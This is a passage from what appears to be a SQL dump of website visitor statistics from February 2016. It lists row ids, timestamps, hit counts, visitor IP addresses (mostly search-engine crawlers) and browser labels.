59761,1,1,0,0,'66.249.66.158','other'),(8452,1456460878,1,1,0,0,'182.118.25.204','msie'),(8453,1456460883,1,1,0,0,'207.46.13.24','other'),(8454,1456461347,1,1,0,0,'101.226.168.205','chrome'),(8455,1456461840,1,1,0,0,'217.69.133.236','other'),(8456,1456462116,1,1,0,0,'101.226.166.210','chrome'),(8457,1456462812,1,0,1,0,'66.249.66.158',''),(8458,1456463039,3,3,0,0,'37.9.122.203','other'),(8459,1456463040,2,2,0,0,'141.8.184.18','other'),(8460,1456463131,2,2,0,0,'178.154.149.11','other'),(8461,1456463241,1,1,0,0,'62.210.215.100','chrome'),(8462,1456464405,1,1,0,0,'178.154.149.11','other'),(8463,1456464408,4,4,0,0,'141.8.184.18','other'),(8464,1456465211,2,2,0,0,'91.121.112.142','other'),(8465,1456465266,2,2,0,0,'66.249.78.144','other'),(8466,1456465344,1,0,1,0,'68.180.229.232',''),(8467,1456465475,1,0,1,0,'66.249.78.158',''),(8468,1456465523,1,0,1,0,'66.249.78.151',''),(8469,1456465699,2,2,0,0,'207.46.13.24','other'),(8470,1456465710,2,2,0,0,'66.249.78.37','other'),(8471,1456466289,2,2,0,0,'66.249.78.151','other'),(8472,1456466442,2,2,0,0,'66.249.78.30','other'),(8473,1456466451,1,1,0,0,'130.193.37.21','other'),(8474,1456466455,1,1,0,0,'141.8.132.99','other'),(8475,1456466460,1,1,0,0,'5.255.253.9','other'),(8476,1456466464,2,2,0,0,'5.255.253.10','other'),(8477,1456466483,1,1,0,0,'66.249.66.129','other'),(8478,1456466512,2,2,0,0,'66.249.78.144','other'),(8479,1456466666,1,1,0,0,'66.249.78.44','other'),(8480,1456466694,1,1,0,0,'66.249.78.37','other'),(8481,1456466730,2,2,0,0,'130.193.51.45','other'),(8482,1456466737,1,1,0,0,'141.8.132.2','other'),(8483,1456466917,1,0,1,0,'66.249.78.158',''),(8484,1456467477,2,2,0,0,'178.154.189.204','other'),(8485,1456467481,2,2,0,0,'37.9.122.203','other'),(8486,1456467751,4,4,0,0,'91.196.178.68','chrome'),(8487,1456467911,1,0,1,0,'66.249.66.158',''),(8488,1456467997,1,1,0,0,'141.8.132.109','other'),(8489,1456468001,1,1,0,0,'5.255.253.17','other'),(8490,1456468216,1,1,0,0,'178.154.189.12','other'),(8491,1456468220,1,1,0,0,'130.193.51.55','other'),(8492,1456468224,1,1,0,0,'141.8.184.31','other'),(8493,1456468227,1,1,0,0,'66.249.93.94','firefox'),(8494,1456468241,1,1,0,0,'91.196.178.68','firefox'),(8495,1456468307,2,2,0,0,'66.249.78.30','other'),(8496,1456468480,2,2,0,0,'66.249.78.158','other'),(8497,1456468917,1,1,0,0,'157.55.39.196','other'),(8498,1456469199,1,1,0,0,'207.46.13.161','other'),(8499,1456469242,1,1,0,0,'66.249.66.158','other'),(8500,1456469498,1,1,0,0,'66.249.78.158','other'),(8501,1456469551,1,1,0,0,'66.249.92.95','other'),(8502,1456470049,1,1,0,0,'40.77.167.1','other'),(8503,1456470337,1,1,0,0,'66.249.78.30','other'),(8504,1456470366,1,1,0,0,'8.29.198.25','other'),(8505,1456470379,1,1,0,0,'91.196.178.166','chrome'),(8506,1456470458,1,1,0,0,'31.128.90.180','chrome'),(8507,1456470470,2,1,1,0,'66.249.78.151',''),(8508,1456470525,1,1,0,0,'91.196.178.71','firefox'),(8509,1456470615,1,1,0,0,'217.69.133.59','other'),(8510,1456470652,4,4,0,0,'94.22.47.242','other'),(8511,1456470884,1,1,0,0,'66.249.78.144','other'),(8512,1456471089,2,2,0,0,'91.196.178.68','chrome'),(8513,1456471481,2,1,1,0,'66.249.78.158',''),(8514,1456471531,1,1,0,0,'185.53.79.20','chrome'),(8515,1456471555,1,1,0,0,'91.196.178.68','firefox'),(8516,1456471895,1,1,0,0,'66.249.78.144','other'),(8517,1456471954,1,1,0,0,'66.249.66.158','other'),(8518,1456472241,1,1,0,0,'91.196.178.72','chrome'),(8519,1456472311,1,1,0,0,'66.249.78.44','other'),(8520,1456472476,1,1,0,0,'188.231.214.75','firefox'),(8521,1456472497,1,1,0,0,'91.196.178.129','firefox'),(8522,1456472764,8,8,0,0,'141.8.184.18','other'),(8523,1456472936,1,1,0,0,'66.249.93.90','firefox'),(8524,1456473036,1,1,0,0,'92.113.0.63','chrome'),(8525,1456473041,1,1,0,0,'178.255.215.95','other'),(8526,1456473238,1,1,0,0,'193.19.84.90','other'),(8527,1456473269,2,2,0,0,'141.8.132.79','other'),(8528,1456473272,2,2,0,0,'130.193.37.27','other'),(8529,1456473276,3,3,0,0,'5.255.253.100','other'),(8530,1456473327,10,10,0,0,'178.154.149.11','other'),(8531,1456473401,1,1,0,0,'78.111.185.198','firefox'),(8532,1456473619,1,0,1,0,'68.180.229.232',''),(8533,1456473633,1,1,0,0,'62.210.215.100','chrome'),(8534,1456473807,6,6,0,0,'130.193.51.102','other'),(8535,1456473810,8,8,0,0,'5.255.253.53','other'),(8536,1456473815,4,4,0,0,'141.8.142.88','other'),(8537,1456473819,3,3,0,0,'141.8.132.97','other'),(8538,1456473827,3,3,0,0,'5.255.253.9','other'),(8539,1456473832,20,20,0,0,'141.8.183.14','other'),(8540,1456473844,59,59,0,0,'141.8.184.18','other'),(8541,1456473848,16,16,0,0,'93.158.152.9','other'),(8542,1456473852,8,8,0,0,'130.193.37.21','other'),(8543,1456473865,9,9,0,0,'141.8.132.99','other'),(8544,1456473869,4,4,0,0,'93.158.152.26','other'),(8545,1456473874,6,6,0,0,'141.8.132.76','other'),(8546,1456473919,3,3,0,0,'141.8.142.10','other'),(8547,1456473923,4,4,0,0,'141.8.184.22','other'),(8548,1456474121,1,1,0,0,'5.255.253.55','other'),(8549,1456474158,5,5,0,0,'130.193.51.43','other'),(8550,1456474160,1,1,0,0,'141.8.132.109','other'),(8552,1456474162,7,7,0,0,'130.193.51.45','other'),(8553,1456474164,2,2,0,0,'141.8.142.8','other'),(8554,1456474166,2,2,0,0,'5.255.253.10','other'),(8555,1456474167,1,1,0,0,'217.69.136.203','other'),(8556,1456474173,1,1,0,0,'5.255.253.51','other'),(8557,1456474175,4,4,0,0,'130.193.51.85','other'),(8558,1456474182,4,4,0,0,'130.193.37.27','other'),(8559,1456474183,1,1,0,0,'213.174.11.37','chrome'),(8561,1456474184,2,2,0,0,'130.193.51.81','other'),(8562,1456474188,1,1,0,0,'5.255.253.110','other'),(8563,1456474189,3,3,0,0,'141.8.142.41','other'),(8564,1456474191,2,2,0,0,'141.8.184.11','other'),(8565,1456474196,7,7,0,0,'5.255.253.100','other'),(8566,1456474229,57,57,0,0,'178.154.149.11','other'),(8567,1456474238,3,3,0,0,'141.8.132.79','other'),(8568,1456474242,2,2,0,0,'5.255.253.30','other'),(8569,1456474245,1,1,0,0,'141.8.132.2','other'),(8570,1456474289,1,0,1,0,'66.249.78.151',''),(8571,1456474436,1,1,0,0,'193.169.80.160','chrome'),(8572,1456474480,2,2,0,0,'66.249.78.151','other'),(8573,1456474588,1,1,0,0,'91.196.179.69','chrome'),(8574,1456474718,1,1,0,0,'66.249.78.44','other'),(8575,1456474781,10,10,0,0,'93.158.152.9','other'),(8576,1456474783,8,8,0,0,'141.8.184.18','other'),(8577,1456474784,4,4,0,0,'141.8.132.99','other'),(8578,1456474786,5,5,0,0,'130.193.37.21','other'),(8579,1456474787,4,4,0,0,'5.255.253.53','other'),(8580,1456474794,1,0,1,0,'68.180.229.232',''),(8581,1456474887,1,1,0,0,'82.145.211.191','other'),(8582,1456475137,1,1,0,0,'157.55.39.211','other'),(8583,1456475150,17,17,0,0,'178.154.149.11','other'),(8584,1456475151,11,11,0,0,'141.8.183.14','other'),(8585,1456475421,21,21,0,0,'5.255.253.100','other'),(8586,1456475422,17,17,0,0,'130.193.51.43','other'),(8587,1456475424,24,24,0,0,'5.255.253.10','other'),(8589,1456475425,18,18,0,0,'130.193.51.81','other'),(8591,1456475426,21,21,0,0,'5.255.253.110','other'),(8592,1456475428,17,17,0,0,'5.255.253.30','other'),(8593,1456475429,16,16,0,0,'130.193.37.27','other'),(8595,1456475432,17,17,0,0,'130.193.51.45','other'),(8596,1456475434,18,18,0,0,'141.8.184.11','other'),(8597,1456475435,27,27,0,0,'5.255.253.9','other'),(8599,1456475436,24,24,0,0,'130.193.51.102','other'),(8600,1456475437,20,20,0,0,'141.8.142.88','other'),(8601,1456475438,24,24,0,0,'141.8.132.76','other'),(8602,1456475440,16,16,0,0,'141.8.142.41','other'),(8603,1456475449,12,12,0,0,'5.255.253.55','other'),(8604,1456475450,17,17,0,0,'141.8.132.79','other'),(8605,1456475453,16,16,0,0,'130.193.51.85','other'),(8606,1456475454,16,16,0,0,'141.8.142.8','other'),(8608,1456475457,1,1,0,0,'207.46.13.161','other'),(8609,1456475462,14,14,0,0,'141.8.132.2','other'),(8610,1456475466,15,15,0,0,'141.8.142.10','other'),(8611,1456475469,13,13,0,0,'141.8.184.22','other'),(8612,1456475471,18,18,0,0,'141.8.132.97','other'),(8613,1456475490,16,16,0,0,'93.158.152.26','other'),(8614,1456475498,3,3,0,0,'178.154.189.6','other'),(8615,1456475579,1,1,0,0,'66.249.78.151','other'),(8616,1456475721,1,1,0,0,'91.196.178.134','chrome'),(8617,1456475764,13,13,0,0,'141.8.184.18','other'),(8618,1456475766,15,15,0,0,'5.255.253.53','other'),(8619,1456475896,2,2,0,0,'5.255.253.51','other'),(8620,1456475898,13,13,0,0,'93.158.152.9','other'),(8621,1456475899,12,12,0,0,'141.8.132.99','other'),(8622,1456475905,12,12,0,0,'130.193.37.21','other'),(8623,1456475906,1,1,0,0,'5.255.253.62','other'),(8624,1456475914,3,3,0,0,'141.8.142.60','other'),(8625,1456475924,1,1,0,0,'141.8.132.44','other'),(8626,1456475932,1,1,0,0,'130.193.50.22','other'),(8627,1456475940,1,1,0,0,'141.8.132.48','other'),(8628,1456475949,2,2,0,0,'141.8.142.82','other'),(8629,1456475961,1,1,0,0,'130.193.51.55','other'),(8630,1456475973,1,0,1,0,'66.249.78.158',''),(8631,1456476035,1,1,0,0,'141.8.132.109','other'),(8632,1456476038,2,2,0,0,'62.21.98.212','firefox'),(8633,1456476040,2,2,0,0,'130.193.51.22','other'),(8634,1456476045,1,1,0,0,'93.158.152.65','other'),(8636,1456476046,1,1,0,0,'130.193.50.31','other'),(8637,1456476048,1,1,0,0,'141.8.184.31','other'),(8638,1456476050,1,1,0,0,'141.8.142.55','other'),(8639,1456476051,1,1,0,0,'5.255.253.17','other'),(8641,1456476052,1,1,0,0,'130.193.51.50','other'),(8642,1456476053,1,1,0,0,'130.193.51.7','other'),(8643,1456476054,1,1,0,0,'5.255.253.79','other'),(8644,1456476075,7,7,0,0,'178.154.149.11','other'),(8646,1456476085,3,3,0,0,'66.249.78.144','other'),(8647,1456476094,7,7,0,0,'141.8.183.14','other'),(8648,1456476127,1,1,0,0,'178.154.189.12','other'),(8649,1456476144,1,1,0,0,'66.249.78.44','other'),(8650,1456476354,3,3,0,0,'66.249.78.158','other'),(8651,1456476471,1,1,0,0,'66.249.78.30','other'),(8652,1456476809,3,3,0,0,'91.196.178.71','firefox'),(8653,1456477069,1,1,0,0,'176.77.72.37','msie'),(8654,1456477422,1,1,0,0,'66.249.66.158','other'),(8655,1456477427,2,0,2,0,'66.249.78.151',''),(8656,1456477482,1,1,0,0,'91.196.178.72','chrome'),(8657,1456477507,1,0,1,0,'66.249.78.158',''),(8658,1456477550,2,2,0,0,'91.196.178.71','chrome'),(8659,1456477717,1,1,0,0,'93.158.152.81','other'),(8660,1456477718,1,1,0,0,'130.193.51.7','other'),(8661,1456477719,1,1,0,0,'178.154.149.11','other'),(8662,1456478521,1,1,0,0,'66.249.78.144','other'),(8663,1456478852,1,1,0,0,'91.196.178.69','firefox'),(8664,1456478967,1,1,0,0,'66.249.78.151','other'),(8665,1456479009,1,1,0,0,'207.46.13.161','other'),(8666,1456479179,1,1,0,0,'5.255.253.30','other'),(8667,1456479180,1,1,0,0,'5.255.253.94','other'),(8668,1456479181,1,1,0,0,'141.8.142.55','other'),(8669,1456479206,2,2,0,0,'66.249.78.158','other'),(8670,1456479298,2,2,0,0,'66.249.66.162','other'),(8671,1456479343,2,2,0,0,'91.196.178.71','firefox'),(8672,1456479455,1,1,0,0,'128.74.247.184','msie'),(8673,1456479687,1,1,0,0,'5.255.253.100','other'),(8674,1456479688,1,1,0,0,'5.255.253.55','other'),(8675,1456479746,1,1,0,0,'66.249.66.158','other'),(8676,1456479892,1,1,0,0,'91.196.178.69','firefox'),(8677,1456479956,1,1,0,0,'178.154.189.204','other'),(8678,1456480007,1,1,0,0,'66.249.78.30','other'),(8679,1456480071,1,1,0,0,'66.249.92.99','other'),(8680,1456480279,1,1,0,0,'5.255.253.110','other'),(8682,1456480280,2,2,0,0,'141.8.132.48','other'),(8683,1456480281,2,2,0,0,'141.8.142.82','other'),(8684,1456480409,1,1,0,0,'91.196.178.72','chrome'),(8685,1456480466,1,1,0,0,'66.249.78.44','other'),(8686,1456480553,2,2,0,0,'141.8.132.99','other'),(8687,1456480554,2,2,0,0,'141.8.184.11','other'),(8689,1456480555,1,1,0,0,'141.8.184.22','other'),(8690,1456480568,1,1,0,0,'141.8.184.6','other'),(8691,1456480569,1,1,0,0,'5.255.253.17','other'),(8692,1456480570,1,1,0,0,'130.193.51.55','other'),(8694,1456480571,1,1,0,0,'93.158.152.9','other'),(8695,1456480572,1,1,0,0,'130.193.37.21','other'),(8696,1456480574,1,1,0,0,'141.8.184.18','other'),(8697,1456480576,1,1,0,0,'130.193.51.43','other'),(8698,1456480577,1,1,0,0,'141.8.142.10','other'),(8699,1456481051,5,5,0,0,'66.249.78.144','other'),(8700,1456481122,1,1,0,0,'180.76.15.136','other'),(8701,1456481123,2,0,2,0,'66.249.78.151',''),(8702,1456481209,1,1,0,0,'8.29.198.26','other'),(8703,1456481312,1,1,0,0,'91.196.178.68','firefox'),(8704,1456481493,1,1,0,0,'66.249.66.166','other'),(8705,1456481762,2,2,0,0,'66.249.66.162','other'),(8706,1456481791,2,2,0,0,'66.249.78.151','other'),(8707,1456481925,1,1,0,0,'141.8.184.6','other'),(8708,1456481926,1,1,0,0,'5.255.253.89','other'),(8710,1456481927,1,1,0,0,'130.193.37.21','other'),(8711,1456481928,1,1,0,0,'141.8.132.99','other'),(8712,1456481930,1,1,0,0,'5.255.253.100','other'),(8715,1456482021,1,0,1,0,'66.249.78.158',''),(8716,1456482022,1,0,1,0,'66.249.78.30',''),(8717,1456482062,1,1,0,0,'141.8.142.10','other'),(8718,1456482063,1,1,0,0,'141.8.184.22','other'),(8719,1456482064,1,1,0,0,'5.255.253.110','other'),(8720,1456482065,1,1,0,0,'5.255.253.30','other'),(8722,1456482066,1,1,0,0,'141.8.132.76','other'),(8723,1456482067,1,1,0,0,'130.193.37.27','other'),(8724,1456482068,1,1,0,0,'130.193.51.85','other'),(8726,1456482805,1,1,0,0,'66.249.78.158','other'),(8727,1456482902,2,0,2,0,'68.180.229.232',''),(8728,1456483038,3,3,0,0,'66.249.78.144','other'),(8729,1456483082,1,0,1,0,'66.249.66.166',''),(8730,1456483365,1,1,0,0,'66.249.78.151','other'),(8731,1456483753,1,1,0,0,'66.249.78.30','other'),(8732,1456483975,2,2,0,0,'66.249.78.144','other'),(8733,1456484259,3,2,1,0,'66.249.78.158',''),(8734,1456484300,1,1,0,0,'217.69.133.67','other'),(8735,1456484551,1,1,0,0,'37.9.122.202','other'),(8736,1456484732,1,1,0,0,'178.154.149.11','other'),(8738,1456484783,1,0,1,0,'66.249.66.166',''),(8739,1456484784,1,1,0,0,'66.249.66.162','other'),(8740,1456484795,1,1,0,0,'141.8.184.18','other'),(8741,1456484796,1,1,0,0,'141.8.183.14','other'),(8742,1456484832,1,1,0,0,'217.69.133.224','other'),(8743,1456485028,1,1,0,0,'66.249.78.144','other'),(8744,1456485098,3,3,0,0,'66.249.78.151','other'),(8745,1456485450,1,1,0,0,'91.196.178.166','chrome'),(8746,1456485686,2,2,0,0,'66.249.78.30','other'),(8747,1456485743,3,3,0,0,'66.249.78.158','other'),(8748,1456486160,1,1,0,0,'66.249.78.151','other'),(8749,1456486187,1,1,0,0,'66.249.78.44','other'),(8750,1456486275,1,1,0,0,'66.249.78.144','other'),(8751,1456486644,1,1,0,0,'91.196.178.35','firefox'),(8752,1456486662,3,3,0,0,'66.249.78.158','other'),(8753,1456486674,1,1,0,0,'91.196.178.166','chrome'),(8754,1456486820,2,2,0,0,'66.249.66.166','other'),(8755,1456487091,1,0,1,0,'66.249.78.151',''),(8756,1456487168,2,2,0,0,'66.249.78.151','other'),(8757,1456487703,2,2,0,0,'66.249.78.158','other'),(8758,1456487851,1,1,0,0,'66.249.66.166','other'),(8759,1456487992,1,0,1,0,'66.249.78.144',''),(8760,1456487996,1,1,0,0,'180.76.15.163','other'),(8761,1456488338,1,1,0,0,'130.193.51.43','other'),(8762,1456488339,1,1,0,0,'5.255.253.9','other'),(8763,1456488505,4,4,0,0,'66.249.78.151','other'),(8764,1456489099,1,1,0,0,'66.249.78.158','other'),(8765,1456489548,1,0,1,0,'66.249.66.166',''),(8766,1456489605,1,1,0,0,'66.249.78.30','other'),(8767,1456489773,1,1,0,0,'141.8.183.14','other'),(8768,1456489847,1,1,0,0,'178.154.149.11','other'),(8769,1456490328,1,0,1,0,'68.180.229.232',''),(8770,1456490464,1,1,0,0,'207.46.13.161','other'),(8771,1456490651,1,1,0,0,'91.196.178.71','firefox'),(8772,1456491151,1,1,0,0,'66.249.92.95','other'),(8773,1456491477,1,1,0,0,'66.249.78.151','other'),(8774,1456491834,1,1,0,0,'66.249.66.166','other'),(8775,1456491948,50,50,0,0,'136.243.36.97','other'),(8776,1456491951,3,3,0,0,'66.249.78.144','other'),(8777,1456491952,1,1,0,0,'207.46.13.4','other'),(8778,1456492116,1,1,0,0,'8.29.198.26','other'),(8779,1456492545,1,1,0,0,'62.210.215.100','chrome'),(8780,1456492630,1,1,0,0,'130.193.51.45','other'),(8781,1456492635,1,1,0,0,'130.193.51.43','other'),(8782,1456492720,1,1,0,0,'180.76.15.150','other'),(8783,1456492755,5,5,0,0,'178.154.149.11','other'),(8784,1456493041,1,1,0,0,'207.46.13.161','other'),(8785,1456493068,6,6,0,0,'141.8.184.18','other'),(8786,1456493077,4,4,0,0,'141.8.183.14','other'),(8787,1456493479,1,1,0,0,'91.196.178.71','firefox'),(8788,1456493611,1,0,1,0,'66.249.66.133',''),(8789,1456493677,2,2,0,0,'178.154.149.11','other'),(8790,1456493793,1,0,1,0,'66.249.66.158',''),(8791,1456493968,1,1,0,0,'66.249.78.158','other'),(8792,1456494040,1,0,1,0,'66.249.78.151',''),(8793,1456494448,3,3,0,0,'66.249.78.151','other'),(8794,1456494510,1,1,0,0,'91.196.178.71','firefox'),(8795,1456494536,4,0,4,0,'68.180.229.232',''),(8796,1456494548,1,1,0,0,'66.249.78.30','other'),(8797,1456494734,1,0,1,0,'66.249.78.144',''),(8798,1456495221,8,6,2,0,'66.249.78.144',''),(8799,1456495433,1,1,0,0,'46.164.144.179','firefox'),(8800,1456495437,1,1,0,0,'66.249.78.158','other'),(8801,1456495475,1,1,0,0,'207.46.13.161','other'),(8802,1456495477,1,0,1,0,'66.249.78.151',''),(8803,1456495541,2,0,2,0,'66.249.78.44',''),(8804,1456495618,1,1,0,0,'66.249.66.162','other'),(8805,1456495627,2,2,0,0,'178.154.149.11','other'),(8806,1456495652,1,1,0,0,'217.69.136.208','other'),(8807,1456495718,1,1,0,0,'141.8.183.14','other'),(8808,1456495761,2,2,0,0,'100.43.85.22','other'),(8809,1456495781,1,1,0,0,'141.8.184.18','other'),(8810,1456495804,10,10,0,0,'82.193.127.15','other'),(8811,1456495875,2,2,0,0,'66.249.78.151','other'),(8812,1456495921,1,1,0,0,'95.67.29.52','other'),(8813,1456495993,2,2,0,0,'66.249.78.144','other'),(8814,1456496201,1,1,0,0,'66.249.66.158','other'),(8815,1456496362,1,1,0,0,'178.154.189.6','other'),(8816,1456496440,1,1,0,0,'66.249.78.44','other'),(8817,1456496558,4,4,0,0,'66.249.78.158','other'),(8818,1456496587,1,1,0,0,'178.154.189.204','other'),(8819,1456496795,1,1,0,0,'66.249.78.151','other'),(8820,1456497152,1,1,0,0,'180.76.15.6','other'),(8821,1456497258,1,1,0,0,'130.193.51.85','other'),(8822,1456497262,1,1,0,0,'141.8.142.88','other'),(8823,1456497355,1,1,0,0,'213.238.8.13','chrome'),(8824,1456497776,4,4,0,0,'66.249.78.158','other'),(8825,1456497866,3,3,0,0,'66.249.78.144','other'),(8826,1456497927,2,2,0,0,'91.196.178.70','other'),(8827,1456497955,2,2,0,0,'66.249.78.151','other'),(8828,1456498124,1,0,1,0,'68.180.229.232',''),(8829,1456498133,1,1,0,0,'66.249.66.158','other'),(8830,1456498609,2,2,0,0,'66.249.78.30','other'),(8831,1456498817,2,2,0,0,'66.249.66.133','other'),(8832,1456498878,1,1,0,0,'46.188.72.133','msie'),(8833,1456498879,1,1,0,0,'176.77.7.101','msie'),(8834,1456498881,1,1,0,0,'176.77.28.241','msie'),(8835,1456498888,1,1,0,0,'95.25.149.253','msie'),(8836,1456498890,1,1,0,0,'109.196.203.43','msie'),(8837,1456498905,9,9,0,0,'66.249.78.144','other'),(8838,1456498935,2,2,0,0,'66.249.78.158','other'),(8839,1456498995,4,4,0,0,'66.249.78.151','other'),(8840,1456499055,2,2,0,0,'66.249.66.158','other'),(8841,1456499233,1,1,0,0,'66.249.66.129','other'),(8842,1456499589,2,2,0,0,'66.249.78.30','other'),(8843,1456499679,2,2,0,0,'66.249.66.162','other'),(8844,1456500155,3,2,1,0,'66.249.78.158',''),(8845,1456500291,1,1,0,0,'178.92.248.85','firefox'),(8846,1456500481,1,1,0,0,'66.249.66.190','other'),(8847,1456500499,1,0,1,0,'66.249.78.144',''),(8848,1456500540,2,2,0,0,'66.249.78.44','other'),(8849,1456500691,6,6,0,0,'66.249.78.151','other'),(8850,1456500783,3,2,1,0,'66.249.78.144',''),(8851,1456500808,1,1,0,0,'66.249.66.158','other'),(8852,1456500838,2,2,0,0,'66.249.78.30','other'),(8853,1456500956,2,2,0,0,'66.249.78.37','other'),(8854,1456500958,1,1,0,0,'217.69.133.219','other'),(8855,1456501016,2,2,0,0,'66.249.66.162','other'),(8856,1456501064,1,1,0,0,'162.210.196.97','other'),(8857,1456501108,5,3,2,0,'66.249.78.144',''),(8858,1456501164,1,1,0,0,'66.249.66.166','other'),(8859,1456501343,4,4,0,0,'66.249.78.158','other'),(8860,1456501360,1,1,0,0,'176.195.189.1','opera'),(8861,1456501561,1,1,0,0,'199.58.86.211','other'),(8862,1456501664,1,1,0,0,'91.196.178.35','chrome'),(8863,1456501818,1,1,0,0,'66.249.66.158','other'),(8864,1456502390,1,1,0,0,'66.249.92.95','other'),(8865,1456502400,1,0,1,0,'66.249.66.162',''),(8866,1456502478,1,1,0,0,'207.46.13.161','other'),(8867,1456502531,1,1,0,0,'66.249.78.144','other'),(8868,1456502562,1,1,0,0,'178.33.6.8','chrome'),(8869,1456502678,49,49,0,0,'82.193.127.15','other'),(8870,1456502882,1,1,0,0,'217.69.136.203','other'),(8871,1456502936,1,1,0,0,'8.29.198.25','other'),(8872,1456503016,1,1,0,0,'178.94.48.0','chrome'),(8873,1456503454,1,1,0,0,'66.249.64.177','other'),(8874,1456503459,1,1,0,0,'94.179.39.172','chrome'),(8875,1456503510,2,0,2,0,'66.249.64.172',''),(8876,1456503685,1,0,1,0,'66.249.64.182',''),(8877,1456504620,1,0,1,0,'66.249.64.182',''),(8878,1456504735,1,1,0,0,'178.92.248.85','firefox'),(8879,1456505240,1,0,1,0,'66.249.64.172',''),(8880,1456506091,1,1,0,0,'66.102.9.104','firefox'),(8881,1456506248,2,0,2,0,'68.180.229.232',''),(8882,1456506403,1,1,0,0,'207.46.13.161','other'),(8883,1456506692,34,34,0,0,'82.193.127.15','other'),(8884,1456506794,1,1,0,0,'40.77.167.1','other'),(8885,1456507099,1,0,1,0,'66.249.64.177',''),(8886,1456507264,1,1,0,0,'217.69.133.232','other'),(8887,1456507462,1,1,0,0,'193.194.127.217','firefox'),(8888,1456507472,1,0,1,0,'66.249.64.182',''),(8889,1456507601,1,0,1,0,'66.249.64.172',''),(8890,1456507752,1,1,0,0,'62.141.50.134','other'),(8891,1456507908,1,1,0,0,'180.76.15.29','other'),(8892,1456508140,1,1,0,0,'207.46.13.161','other'),(8893,1456508203,1,0,1,0,'66.249.64.177',''),(8894,1456508245,1,0,1,0,'66.249.64.32',''),(8895,1456508269,1,1,0,0,'92.112.48.158','chrome'),(8896,1456508370,1,0,1,0,'66.249.64.22',''),(8897,1456508728,2,1,1,0,'66.249.64.172',''),(8898,1456509105,1,1,0,0,'193.194.127.217','firefox'),(8899,1456509170,1,1,0,0,'78.111.190.157','chrome'),(8900,1456509741,1,0,1,0,'66.249.64.172',''),(8901,1456509854,1,0,1,0,'66.249.64.32',''),(8902,1456510088,3,0,3,0,'66.249.64.27',''),(8903,1456510093,1,1,0,0,'91.196.177.69','chrome'),(8904,1456510143,3,0,3,0,'68.180.229.232',''),(8905,1456510158,1,1,0,0,'37.53.89.22','chrome'),(8906,1456510234,1,1,0,0,'178.154.189.204','other'),(8907,1456510601,1,0,1,0,'66.249.64.177',''),(8908,1456510642,3,1,2,0,'66.249.64.172',''),(8909,1456510809,1,0,1,0,'66.249.64.182',''),(8910,1456510881,1,1,0,0,'188.120.231.199','chrome'),(8911,1456510948,1,1,0,0,'178.92.248.85','firefox'),(8912,1456511505,2,1,1,0,'66.249.64.182',''),(8913,1456511546,4,0,4,0,'66.249.64.172',''),(8914,1456511719,1,0,1,0,'66.249.64.177',''),(8915,1456511738,3,0,3,0,'66.249.64.32',''),(8916,1456511925,1,1,0,0,'180.76.15.5','other'),(8917,1456512174,2,2,0,0,'66.249.64.182','other'),(8918,1456512664,1,0,1,0,'66.249.64.172',''),(8919,1456512901,1,1,0,0,'66.249.89.93','other'),(8920,1456512916,3,3,0,0,'66.249.64.177','other'),(8921,1456513019,1,1,0,0,'157.55.39.196','other'),(8922,1456513031,3,2,1,0,'66.249.64.172',''),(8923,1456513161,1,1,0,0,'62.210.215.100','chrome'),(8924,1456513226,13,13,0,0,'141.8.184.18','other'),(8925,1456513235,2,2,0,0,'178.154.149.11','other'),(8926,1456513306,2,0,2,0,'68.180.229.232',''),(8927,1456513768,1,1,0,0,'8.29.198.26','other'),(8928,1456514132,1,1,0,0,'66.249.64.182','other'),(8929,1456514156,4,4,0,0,'66.249.64.177','other'),(8930,1456514200,1,1,0,0,'66.249.64.32','other'),(8931,1456514865,1,0,1,0,'66.249.64.172',''),(8932,1456515116,2,2,0,0,'66.249.64.182','other'),(8933,1456515123,1,1,0,0,'141.8.184.18','other'),(8934,1456515127,1,1,0,0,'141.8.183.14','other'),(8935,1456515131,1,1,0,0,'5.255.253.53','other'),(8936,1456515387,1,1,0,0,'157.55.39.69','other'),(8937,1456515603,5,5,0,0,'66.249.64.172','other'),(8938,1456515625,4,4,0,0,'66.249.64.177','other'),(8939,1456515647,1,1,0,0,'157.55.39.196','other'),(8940,1456515737,1,0,1,0,'68.180.229.232',''),(8941,1456515889,1,1,0,0,'94.178.7.106','firefox'),(8942,1456516240,1,1,0,0,'91.196.178.133','chrome'),(8943,1456516445,2,2,0,0,'66.249.64.22','other'),(8944,1456516510,1,0,1,0,'157.55.39.69',''),(8945,1456516555,1,0,1,0,'66.249.64.177',''),(8946,1456516585,2,1,1,0,'66.249.64.172',''),(8947,1456516605,2,2,0,0,'66.249.64.177','other'),(8948,1456516888,3,0,3,0,'68.180.229.232',''),(8949,1456516909,3,3,0,0,'66.249.64.172','other'),(8950,1456516960,1,1,0,0,'66.249.81.208','other'),(8951,1456516981,1,1,0,0,'46.211.113.36','chrome'),(8952,1456517081,1,1,0,0,'217.69.133.241','other'),(8953,1456517336,3,3,0,0,'66.249.64.182','other'),(8954,1456517600,1,1,0,0,'207.46.13.161','other'),(8955,1456517654,1,0,1,0,'66.249.64.22',''),(8956,1456517851,200,200,0,0,'80.91.162.99','other'),(8957,1456517939,2,1,1,0,'66.249.64.172',''),(8958,1456518007,3,3,0,0,'66.249.64.172','other'),(8959,1456518152,206,206,0,0,'82.193.127.15','other'),(8960,1456518171,6,6,0,0,'66.249.64.177','other'),(8961,1456518193,1,1,0,0,'82.145.218.15','other'),(8962,1456518559,1,1,0,0,'141.8.132.97','other'),(8963,1456518562,1,1,0,0,'141.8.184.18','other'),(8964,1456518568,1,1,0,0,'141.8.142.8','other'),(8965,1456518570,1,1,0,0,'130.193.37.27','other'),(8966,1456518575,1,1,0,0,'5.255.253.51','other'),(8967,1456518579,1,1,0,0,'141.8.142.55','other'),(8968,1456518663,1,1,0,0,'157.55.39.196','other'),(8969,1456518755,100,100,0,0,'80.91.162.99','other'),(8970,1456519004,1,1,0,0,'178.154.149.11','other'),(8971,1456519008,2,2,0,0,'93.158.152.9','other'),(8972,1456519073,1,1,0,0,'66.249.81.205','other'),(8973,1456519129,1,1,0,0,'66.249.64.177','other'),(8974,1456519156,2,1,1,0,'66.249.64.172',''),(8975,1456519270,1,1,0,0,'66.249.64.22','other'),(8976,1456519488,1,1,0,0,'217.69.133.9','other'),(8977,1456519549,2,2,0,0,'66.249.64.182','other'),(8978,1456520018,2,2,0,0,'66.249.64.172','other'),(8979,1456520444,1,0,1,0,'66.249.64.177',''),(8980,1456521023,2,2,0,0,'66.249.64.172','other'),(8981,1456521182,2,2,0,0,'141.8.183.14','other'),(8982,1456521186,1,1,0,0,'141.8.184.11','other'),(8983,1456521227,1,1,0,0,'37.55.225.212','chrome'),(8984,1456521259,58,58,0,0,'82.193.127.15','other'),(8985,1456521307,1,1,0,